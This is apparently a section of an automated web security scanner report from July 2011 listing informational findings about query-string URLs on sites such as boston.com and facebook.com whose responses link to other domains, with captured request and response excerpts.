<h3><a href="http://www.acronymattic.com/MSNDN.html" onmousedown="return si_T('&ID=SERP,5249.1')"><strong>
...[SNIP]...
<h3><a href="http://support.microsoft.com/kb/893357" onmousedown="return si_T('&ID=SERP,5276.1')">The Wi-Fi Protected Access 2 (WPA2)/Wireless Provisioning Services ...</a>
...[SNIP]...
<h3><a href="http://www.dictionary.msn.com/" onmousedown="return si_T('&ID=SERP,5312.1')">Dictionary - MSN Encarta</a>
...[SNIP]...
<h3><a href="http://channel9.msdn.com/" onmousedown="return si_T('&ID=SERP,5362.1')">Channel 9: Videos about the people building Microsoft Products ...</a>
...[SNIP]...
<h3><a href="http://explorer.msn.com/install.htm" onmousedown="return si_T('&ID=SERP,5409.1')">MSN Explorer</a>
...[SNIP]...
<h3><a href="http://money.msn.com/" onmousedown="return si_T('&ID=SERP,5461.1')">Money: Personal finance & investing news & advice - MSN Money</a>
...[SNIP]...
</span><a href="http://go.microsoft.com/?linkid=9771044" class="sn_link" tabindex="0" onmousedown="return si_T('&ID=SERP,5526.1')"><span>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&ID=FD,90.1')">Privacy</a> | </li><li><a href="http://g.msn.com/0TO_/enus" onmousedown="return si_T('&ID=FD,92.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&ID=FD,94.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.msn.com/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&ID=FD,96.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-US/bing/ff808535.aspx" id="sb_help" target="_blank" onmousedown="return si_T('&ID=FD,98.1')">Help</a> | </li><li><a href="https://feedback.live.com/default.aspx?locale=en-US&productkey=wlsearchweb&P1=dsatweb&P2=msndn&P3=9013&P4=MSSRPD&P5=E361C23374E642C998D8ABA7166A75EC&P6=Washington, District Of Columbia&P9=38.906898498%2f-77.028396606&P10=0&P11=&searchtype=Web+Search&optl1=1&backurl=http%3a%2f%2fwww.bing.com%2fsearch%3fq%3dmsndn%26FORM%3dFEEDTU" id="sb_feedback" onclick="si_fb.openCard(this);return false" onfocus="si_fb.loadCard()" onmousedown="return si_T('&ID=FD,100.1')">Tell us what you think</a>
...[SNIP]...

18.129. http://www.boston.com/dynamicassembly/sitepath54/js_output.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.boston.com
Path:	/dynamicassembly/sitepath54/js_output.js

Issue detail

The page was loaded from a URL containing a query string:

http://www.boston.com/dynamicassembly/sitepath54/js_output.js?cache5min=4371429

The response contains the following link to another domain:

http://www.uclick.com/client/bos/el/?p1=Bottom_Plus_Horoscopes

Request

GET /dynamicassembly/sitepath54/js_output.js?cache5min=4371429 HTTP/1.1
Host: www.boston.com
Proxy-Connection: keep-alive
Referer: http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/?p1=Upbox_links
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW804GIB4AATB3; s_vi=[CS]v1|2703101A8516139C-400001A3C00CA954[CE]; anonId=c78dd2a2-2fd6-478d-a9a0-c99ad34539e3; _chartbeat2=2gl4d8yk23g2sl2m; bcpage=6; mbox=check#true#1311428842|session#1311428781592-195064#1311430642|level#10#1321796782|traffic#true#1321796782|PC#1311428781592-195064.17#1312638385; __unam=b6206f2-130c7ed914a-12883c53-5

Response

HTTP/1.1 200 OK
Date: Sat, 23 Jul 2011 13:48:26 GMT
Server: Apache/2.2.13 (Unix) modpath/0.4
Last-Modified: Fri, 22 Jul 2011 19:58:08 GMT
Accept-Ranges: bytes
Content-Length: 4242
Served-By: rebecca
Content-Type: application/javascript
Set-Cookie: bcpage=6;expires=Sun, 26-Jun-2016 13:48:26 GMT;path=/;domain=boston.com;

document.write('<div id="insideBcom"><h3 class="sectionHeader">INside Boston.com</h3><ul class="insideBcomList"><li\n');
document.write(' class="insideContent" id="ic1"><a class="insideTease"\n');
...[SNIP]...
<li><a href="http://www.uclick.com/client/bos/el/?p1=Bottom_Plus_Horoscopes"\n');
document.write(' class="bold">Horoscopes</a>
...[SNIP]...

18.130. http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.boston.com
Path:	/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/

Issue detail

The page was loaded from a URL containing a query string:

http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/?p1=Upbox_links

The response contains the following links to other domains:

http://an.tacoda.net/an/13651/slf.js
http://bostonglobe.com/aboutus/contact_us/default.aspx
http://bostonglobe.com/advertiser/default.aspx
http://bostonglobe.com/subscribers/custserv.aspx?id=5274
http://bostonglobe.com/subscribers/extras/index.aspx
http://bostonglobe.com/subscribers/homedelivery.aspx?id=5278
http://jobsearch.boston.monster.com/jobs/boston-globe-media+boston-globe+boston__2ecom_666?where=Boston__2C-MA&rad=10&sort=rv.dt&cy=us
http://nytbglobe.112.2o7.net/b/ss/nytbglobe/1/H.19.3--NS/0
http://reprints.bostonglobe.com/
http://secure-us.imrworldwide.com/cgi-bin/m?ci=us-604060h&cg=0&cc=1&ts=noscript
http://twitter.com/Klout
http://twitter.com/asimpson920
http://twitter.com/bethteitell
http://w.sharethis.com/button/sharethis.js
http://www.bostonglobe.com/advertiser/online/online.aspx?id=13052
http://www.doriancolor.com/page3.html
http://www.facebook.com/plugins/like.php?href=http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations&show_faces=false&width=178&font=arial&ref=art
http://www.omniture.com/
http://www.truste.org/ivalidate.php?url=www.boston.com&sealid=101
https://bostonglobe.com/subscriber/offer/go/zip.asp?cd=WW015697&od=28

Request

Response

HTTP/1.1 200 OK
Date: Sat, 23 Jul 2011 13:48:28 GMT
Server: Apache/2.2.17 (Linux/SUSE) PHP/5.3.5
X-Powered-By: PHP/5.3.5
Set-Cookie: bcpage=0;expires=Sun, 26-Jun-2016 13:48:13 GMT;path=/;domain=boston.com;
Accept-Ranges: bytes
Served-By: tjanefer
Content-Type: text/html
Set-Cookie: bcpage=7;expires=Sun, 26-Jun-2016 13:48:14 GMT;path=/;domain=boston.com;
Content-Length: 49839
Connection: Keep-Alive

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>

<title>Facebook, Twitter obligations persist during vacations - The
...[SNIP]...
<span id="gLogoSub"><a href="https://bostonglobe.com/subscriber/offer/go/zip.asp?cd=WW015697&od=28">Home Delivery</a>
...[SNIP]...
<li id="shareReprints"><a href="http://reprints.bostonglobe.com/" target="reprints">Reprints</a>
...[SNIP]...
<p>“Leave town for 3 days for a funeral and my <a href="http://twitter.com/Klout" target="_new">@Klout</a> score drops 8 points,’’ tweeted <a href="http://twitter.com/asimpson920" target="_new">@asimpson920</a>
...[SNIP]...
</a>. Follow her on Twitter <a href="http://twitter.com/bethteitell" target="_new">@bethteitell</a>
...[SNIP]...
<div id="bdc_shareButtons" class="three outset">
<iframe id="bdc_facebook" scrolling="no"
frameborder="0"
allowtransparency="true"
src="http://www.facebook.com/plugins/like.php?href=http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations&show_faces=false&width=178&font=arial&ref=art"></iframe>
...[SNIP]...
</a>
<script src="http://w.sharethis.com/button/sharethis.js#publisher=e1e0ea5a-a326-4731-b1d1-f21623043511&type=website&button=false" type="text/javascript"></script>
...[SNIP]...
<div align="center">
<a href="http://www.truste.org/ivalidate.php?url=www.boston.com&sealid=101"><img height="47" width="171" src="http://graphics.boston.com/images/registration/truste2007/TRUSTe_Certified_Privacy.gif" alt="TRUSTe Certified Privacy" />
...[SNIP]...
<li><a rel="nofollow" href="http://www.bostonglobe.com/advertiser/online/online.aspx?id=13052">Advertise</a>
...[SNIP]...
<li><a href="http://jobsearch.boston.monster.com/jobs/boston-globe-media+boston-globe+boston__2ecom_666?where=Boston__2C-MA&rad=10&sort=rv.dt&cy=us">Work here</a>
...[SNIP]...
<li class="first"><a rel="nofollow" href="http://bostonglobe.com/aboutus/contact_us/default.aspx">Contact The Boston Globe</a>
...[SNIP]...
<li><a href="http://bostonglobe.com/subscribers/homedelivery.aspx?id=5278">Subscribe</a>
...[SNIP]...
<li><a rel="nofollow" href="http://bostonglobe.com/subscribers/custserv.aspx?id=5274">Manage your subscription</a>
...[SNIP]...
<li><a href="http://bostonglobe.com/advertiser/default.aspx">Advertise</a>
...[SNIP]...
<li><a rel="nofollow" href="http://bostonglobe.com/subscribers/extras/index.aspx">The Boston Globe Extras</a>
...[SNIP]...
<li><a rel="nofollow" href="http://www.doriancolor.com/page3.html">The Boston Globe Gallery</a>
...[SNIP]...
<noscript><a href="http://www.omniture.com" title="Web Analytics"><img src="http://nytbglobe.112.2O7.net/b/ss/nytbglobe/1/H.19.3--NS/0" height="1" width="1" border="0" alt="" /></a>
...[SNIP]...
</script><script src="http://an.tacoda.net/an/13651/slf.js" language="JavaScript"></script>
...[SNIP]...
<div>
<img src="//secure-us.imrworldwide.com/cgi-bin/m?ci=us-604060h&cg=0&cc=1&ts=noscript" width="1" height="1" alt="" />
</div>
...[SNIP]...

18.131. http://www.capitalone.com/directbanking/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/directbanking/

Issue detail

The page was loaded from a URL containing a query string:

http://www.capitalone.com/directbanking/?linkid=WWW_Z_NDB_A6A58_SP30_C1_01_T_SP1SP1

The response contains the following link to another domain:

http://fls.doubleclick.net/activityi;src=1330903;type=ndbrv204;cat=ndbho277;u3=FB8DCF93533EFDA4;ord=1?

Request

Response

18.132. http://www.datacard.com/combined.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.datacard.com
Path:	/combined.js

Issue detail

The page was loaded from a URL containing a query string:

http://www.datacard.com/combined.js;jsessionid=FEBD781C8E9F0320A0CDFE03A28F4DE0

The response contains the following link to another domain:

http://get.adobe.com/flashplayer/

Request

Response

18.133. http://www.facebook.com/connect/connect.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/connect/connect.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/connect/connect.php?id=17890180291&connections=6&stream=0

The response contains the following links to other domains:

http://profile.ak.fbcdn.net/hprofile-ak-snc4/174507_515618441_1946728_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/212012_625515807_7782270_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/273957_777077725_1131811_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/273979_100002606574499_6999529_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/27401_1028476164_4478_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/276219_100000442030274_4032990_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/50412_17890180291_5773186_q.jpg
http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif
http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/jbHiQwYzYKQ.js
http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/eXHcpRoThZn.js
http://static.ak.fbcdn.net/rsrc.php/v1/y8/r/JSqaF4G1Vob.css
http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/cNiPtQXsNfj.css
http://static.ak.fbcdn.net/rsrc.php/v1/yd/r/kBiKV12z46R.css
http://static.ak.fbcdn.net/rsrc.php/v1/yf/r/e0OzuKrROTf.css
http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/XJ-mTyMG8hy.js
http://static.ak.fbcdn.net/rsrc.php/v1/yx/r/-zTzCY4nRsr.js

Request

GET /connect/connect.php?id=17890180291&connections=6&stream=0 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.treehugger.com/files/2011/07/sea-shepherd-ship-detained-shetland-islands-million-dollar-bond-needed.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.178.41
X-Cnection: close
Date: Sat, 23 Jul 2011 13:19:14 GMT
Content-Length: 9700

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Connect</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/cNiPtQXsNfj.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y8/r/JSqaF4G1Vob.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yd/r/kBiKV12z46R.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yf/r/e0OzuKrROTf.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/eXHcpRoThZn.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yx/r/-zTzCY4nRsr.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/XJ-mTyMG8hy.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/jbHiQwYzYKQ.js"></script>
...[SNIP]...
<a href="http://www.facebook.com/TreeHugger" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/50412_17890180291_5773186_q.jpg" alt="TreeHugger" /></a>
...[SNIP]...
<a href="" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002606574499" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/273979_100002606574499_6999529_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/joecarlo717" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/276219_100000442030274_4032990_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=777077725" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/273957_777077725_1131811_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/27401_1028476164_4478_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/174507_515618441_1946728_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/212012_625515807_7782270_q.jpg" alt="" /><div class="name">
...[SNIP]...

18.134. http://www.facebook.com/connect/connect.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/connect/connect.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/connect/connect.php?id=17890180291&connections=6&stream=0

The response contains the following links to other domains:

http://profile.ak.fbcdn.net/hprofile-ak-snc4/174507_515618441_1946728_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/195622_1767144201_328422_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/212012_625515807_7782270_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/273957_777077725_1131811_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/273979_100002606574499_6999529_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/27401_1028476164_4478_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/50412_17890180291_5773186_q.jpg
http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif
http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/jbHiQwYzYKQ.js
http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/eXHcpRoThZn.js
http://static.ak.fbcdn.net/rsrc.php/v1/y8/r/JSqaF4G1Vob.css
http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/cNiPtQXsNfj.css
http://static.ak.fbcdn.net/rsrc.php/v1/yd/r/kBiKV12z46R.css
http://static.ak.fbcdn.net/rsrc.php/v1/yf/r/e0OzuKrROTf.css
http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/XJ-mTyMG8hy.js
http://static.ak.fbcdn.net/rsrc.php/v1/yx/r/-zTzCY4nRsr.js

Request

GET /connect/connect.php?id=17890180291&connections=6&stream=0 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.treehugger.com/travel_nature/?campaign=th_nav_travel
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.208.31
X-Cnection: close
Date: Sat, 23 Jul 2011 13:19:46 GMT
Content-Length: 9649

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Connect</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/cNiPtQXsNfj.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y8/r/JSqaF4G1Vob.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yd/r/kBiKV12z46R.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yf/r/e0OzuKrROTf.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/eXHcpRoThZn.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yx/r/-zTzCY4nRsr.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/XJ-mTyMG8hy.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/jbHiQwYzYKQ.js"></script>
...[SNIP]...
<a href="http://www.facebook.com/TreeHugger" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/50412_17890180291_5773186_q.jpg" alt="TreeHugger" /></a>
...[SNIP]...
<a href="" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=777077725" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/273957_777077725_1131811_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/174507_515618441_1946728_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/212012_625515807_7782270_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/27401_1028476164_4478_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002606574499" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/273979_100002606574499_6999529_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=1767144201" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/195622_1767144201_328422_q.jpg" alt="" /><div class="name">
...[SNIP]...

18.135. http://www.facebook.com/connect/connect.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/connect/connect.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/connect/connect.php?id=17890180291&connections=6&stream=0

The response contains the following links to other domains:

http://profile.ak.fbcdn.net/hprofile-ak-snc4/195622_1767144201_328422_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/202992_100001598214252_2423731_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/212012_625515807_7782270_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/273957_777077725_1131811_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/273979_100002606574499_6999529_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/273997_100001541848680_682388_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/50412_17890180291_5773186_q.jpg
http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif
http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/jbHiQwYzYKQ.js
http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/eXHcpRoThZn.js
http://static.ak.fbcdn.net/rsrc.php/v1/y8/r/JSqaF4G1Vob.css
http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/cNiPtQXsNfj.css
http://static.ak.fbcdn.net/rsrc.php/v1/yd/r/kBiKV12z46R.css
http://static.ak.fbcdn.net/rsrc.php/v1/yf/r/e0OzuKrROTf.css
http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/XJ-mTyMG8hy.js
http://static.ak.fbcdn.net/rsrc.php/v1/yx/r/-zTzCY4nRsr.js

Request

GET /connect/connect.php?id=17890180291&connections=6&stream=0 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.treehugger.com/science_technology/?campaign=th_nav_scitech
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.221.65
X-Cnection: close
Date: Sat, 23 Jul 2011 13:43:28 GMT
Content-Length: 9791

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Connect</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/cNiPtQXsNfj.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y8/r/JSqaF4G1Vob.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yd/r/kBiKV12z46R.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yf/r/e0OzuKrROTf.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/eXHcpRoThZn.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yx/r/-zTzCY4nRsr.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/XJ-mTyMG8hy.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/jbHiQwYzYKQ.js"></script>
...[SNIP]...
<a href="http://www.facebook.com/TreeHugger" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/50412_17890180291_5773186_q.jpg" alt="TreeHugger" /></a>
...[SNIP]...
<a href="" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002606574499" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/273979_100002606574499_6999529_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/212012_625515807_7782270_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100001598214252" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/202992_100001598214252_2423731_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100001541848680" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/273997_100001541848680_682388_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=777077725" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/273957_777077725_1131811_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=1767144201" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/195622_1767144201_328422_q.jpg" alt="" /><div class="name">
...[SNIP]...

18.136. http://www.facebook.com/connect/connect.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/connect/connect.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/connect/connect.php?id=17890180291&connections=6&stream=0

The response contains the following links to other domains:

http://b.static.ak.fbcdn.net/rsrc.php/v1/y4/r/eXHcpRoThZn.js
http://b.static.ak.fbcdn.net/rsrc.php/v1/yO/r/F4fS63UxgpV.css
http://b.static.ak.fbcdn.net/rsrc.php/v1/yp/r/XJ-mTyMG8hy.js
http://b.static.ak.fbcdn.net/rsrc.php/v1/yu/r/MatpvpYmg_x.css
http://profile.ak.fbcdn.net/hprofile-ak-snc4/195295_100001660921957_793145_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/195522_1238529586_5979087_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/203281_828264991_3228244_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/211515_631263271_7135587_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/273470_100001834130658_3506797_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/273997_100001541848680_682388_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/50412_17890180291_5773186_q.jpg
http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif
http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/jbHiQwYzYKQ.js
http://static.ak.fbcdn.net/rsrc.php/v1/yW/r/F56NTl3Vdyk.css
http://static.ak.fbcdn.net/rsrc.php/v1/yc/r/rvK2wZMiBgl.css
http://static.ak.fbcdn.net/rsrc.php/v1/yx/r/-zTzCY4nRsr.js

Request

GET /connect/connect.php?id=17890180291&connections=6&stream=0 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.facebook.com

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.58.33
X-Cnection: close
Date: Sat, 23 Jul 2011 14:52:46 GMT
Content-Length: 10091

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Connect</title>
